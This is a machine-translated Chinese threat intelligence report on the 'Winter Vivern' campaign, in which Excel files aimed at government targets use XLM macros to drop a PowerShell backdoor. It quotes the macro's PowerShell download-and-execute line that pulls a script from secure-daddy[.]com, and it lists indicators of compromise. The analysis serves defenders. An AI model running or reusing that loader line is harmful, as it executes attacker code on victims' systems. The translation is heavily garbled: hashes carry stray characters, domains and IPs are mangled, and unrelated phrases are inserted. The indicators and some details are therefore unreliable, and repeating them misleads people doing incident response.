执行概要
在使用XLM 4.0宏解析Microsoft Excel文档时,DomainTools Research团队无意中发现了一个立陶宛语文档标题“contacts”。本文档中的简单宏删除了一个稍微复杂一些的PowerShell脚本,该脚本与一个自2020年12月以来一直活跃的域执行C2通信,该域没有出现在任何行业标准的块列表中。最近的域名服务文件是在2021年4月注册的,DomainTools Research认为,其他用于短期发布的域名可能会导致其他文件。提到的宏和域,在继续搜索时,揭露了针对阿塞拜疆、塞浦路斯、印度、意大利、立陶宛、乌克兰和梵蒂冈的文件。由于过去几个月在C2通信中使用的路径,DomainTools研究团队将其口头称为“Winter Vivern”。
辩护人的背景
XLM 4.0宏,微软Office文档中VBA的前身,继续成为一个问题恶意软件作者利用它们来避免被发现。很多时候,可以使用跨越多个单元并使用模糊处理的精心设计的宏来隐藏对手的基础设施,使其不受病毒扫描程序和其他工具的影响。虽然在过去的几年里工具已经取得了长足的进步,XLM宏已经成为时尚,但DomainTools Research团队仍在继续寻找攻击者在这些文档中隐藏域的新方法。
我们建议任何查看包含XLM宏的文档的人都可以看看出色的XLMMacroDeobfuscator辅助解析的工具。但是,一定要注意目前有一个bug会破坏去模糊化多个宏在一个单元中.这就是DomainTools研究团队在寻找以这种方式失败的文档时试图解决的错误。幸运的是,项目维护者已经在测试分支中修复了这个问题,如果您作为一个防御者在您所分析的文档中遇到这个问题。
恶意文件
最初的立陶宛语文件,标题为vtas_kontaktai_2021_04_20.xls,包含在文档无法正常工作时启用内容的典型请求。该文件称,它包含了“城市儿童权利保护行政部门的联系方式”。
这是一份由立陶宛官方政府提供的文件,可在谷歌上找到,如下所示。
但是,修改后的版本包含一个恶意的XLM 4.0宏,该宏会调用域secure-daddy[.]com。这篇文章紧随本文后面提到的所有后续文档。
调用("kernel32","WinExec","JCJ","powershell -c ""iex (New-Object Net.Webclient)。DownloadString (' https://secure-daddy [] com/wintervivern/server/serverHttpRequest(运行). txt ')”“”,0)
在执行该字符串时,将下拉另一个PowerShell脚本并运行,该脚本将下拉两个计划任务文件中的一个,具体取决于它所感染的Microsoft Windows版本。这些调度任务定期运行上述来自secure-daddy[的pull。这样脚本就可以保持自身的更新。该脚本包含一个简单的推送,其中包含C2上的所有系统信息,然后定期检查新命令,大概能够抛出另一个有效负载。
额外的目标
检查VirusTotal上文档的起源,我们可以看到初始文档来自URL:
https://securemanag com/data/public/uploads/2017/08/vtas_kontaktai_2021_04_20.xls(。)
这个网址还提供阿塞拜疆语的签证申请。xls和和平机构一般的英文联系文件。所有文档都包含上面提到的PowerShell脚本。当寻找任何东西时,呼唤安全的爸爸。我们发现了意大利语的Rassegna Documentazioni Dicastero per la unicazioni .xls(首次见21003-07)和塞浦路斯语的文档Ενημερωμένος κατ λογο泊索.xls(首次见21004-21),这是另一组以联系为主题的文档。到目前为止,所有文档的作者都是“Admin”,并且包含一个西里尔字母代码页。
自2020年12月以来,secure-daddy[.]com也参与了通过两个url分发文件的活动,这表明早先针对印度政府和梵蒂冈的目标是:
https://secure-daddy [,] com/mail.gov.in/iwc_static/c11n/allDomain/Documents/mealib/List%20of%20online%20databases.xls https://secure-daddy com/www.sdsofficium.va/portale/portalesdsext.nsf/。
攻击者的基础设施
检查攻击者的基础设施,我们发现这两个域都不在行业标准的屏蔽列表中,但DomainTools预测风险评分算法确实将它们作为恶意软件的最高可能风险进行了适当的评级。
而初始C2域secure-daddy[。. com于2020年12月注册,服务域securemanag[.]com从2021年4月起才活跃起来。这向我们表明,对手很可能正在开始一个新的活动,从这个地址提供文件,并将他们的C2隐藏在他们重用以前的基础设施后面。两个域都托管在3NT Solutions LLP上,但被划分为乐动体育网址瑞典的旧域和爱沙尼亚的新域。
检查被动DNS,我们可以看到在C2域上已经有了相当多的活动,因此推测其中一些文档已经工作,更多的文档已经在野外。此外,SPF记录表明它接受来自广泛服务器的邮件,并被设置(每个SPF记录使用~all)以在转换中发送邮件。
较新的文档服务域具有类似的设置,但只包含宿主[。com部分的SPF记录。然而,更有趣的是,这个域后面的IP地址以前是承载centre -security[.]com的。当在VirusTotal中搜索时,这显示了另一个针对乌克兰语使用者的文件,网址为https://centr-security[.] com/mil.gov.u/documents/stat/statistics-donbas-07042021.xls。
重要的是要注意到中心安全[。]com已经被列入黑名单,但该域名欺骗了欧洲国家顶级域名注册商委员会(center)。
结论
自2020年12月左右以来,这一运动似乎基本上没有被发现,目标和语言广泛。由于这些脚本非常简洁,我们不认为这是一个复杂的apt级别的活动,因为它没有利用任何已知的工具。然而,我们觉得有一点很重要,那就是老练并不是成功的必要条件。由于这个文档集群不能与任何其他活动绑定,目前很难进行归因,DomainTools Research将其作为一个独立集群进行监控。
国际石油公司
文件哈希表
| 文件名称 | 哈希 |
|---|---|
| Ενημερωμένοςκατάλογοςxls | 94年f45ba55420961451afd1b70657375ec64b7697a515a37842478a5009694cfa |
| Ενημερωμένοςκατάλογος_NS.xls | 2 a176721b35543d7f4d9e3d24a7c50e0ea57d7eaa251c6b24985d5266a6a977a |
| vtas_kontaktai_2021_04_20.xls | f84044bddbd3e05fac1319c988919492971553bb65dbf7b7988d66a8cd677eb8 |
| application-for-visa.xls | bd1efa4cf3f02cd8723c48deb5f69a432c22f359b93cab4f1d2a9f037a236eaa |
| DB % 20 - % 20和平% 20机构% 20 xls(草案) | 00 f6291012646213a5aab81153490bb121bbf9c64bb62eb4ce582c3af88bccfd |
| Rassegna Documentazioni Dicastero per la communicunicazioni .xls | 638年bedcc00c1b1b8a25026b34c29cecc76c050aef56fa55f6e8878e6b951e473 |
| serverHttpRequest(运行). txt | c34e98a31246f0903d4742dcf0a9890d5328ba8a1897fcf9cd803e104591ed5f |
域
centr-security(。com secure-daddy[。] com securemanage。com
IP地址
37[] 252[,] 9[。37] 123[252年][]5 []133
虹膜调查哈希
U2FsdGVkX1 + / QFMAzMGoRJL1g99F / qbks7NwRHYLPXkMcCCMO1whT0jHrV5fHxs8ZVy3Cc2kvVawfePzqppMhHBvCquXS2sz1JKAw2lAbjSl + B7HbHYU7TOK7MWpiXq + WKx2n0C8DWcoRWxZZBtN / wIIdpWfTt5I8j1WJRd07KTMddZaS + xKsm8U51C + Rq8MxabinBbb0ZnnqRXQTIdwRDE1mNiS9GhS6I8 / scMTqVgNy5LjDKtIS43 + i0YlsjcAjHPAjv0zv7mfaiGbO08V95Wewf7CZBZM3njl5ADVPJet4qZ28yfT52cDfqDRiPFVhocE5u3qeMpc3sVQBFWCDVvOo99HHsnLumbOkt3lJlEhO8CsPyJ4qaKsnKYG2vFG6b + C14hVzMDHcAsXI35HikbLj80O5xdVnDlx7ydf0yKcCLn6s0ru + OIMf2RlsjLIxo2sIjnBveWos9wNUcgXMf2UOWvP4XPkLXvUdSYaJCETtmzE1KfxpasB8IxzSiZaMTUg4COEsWG + jhUKI6Z + 4 y9icc7cdiktsxsfzhpac30gyk3crye0ft3yw +或+ ydV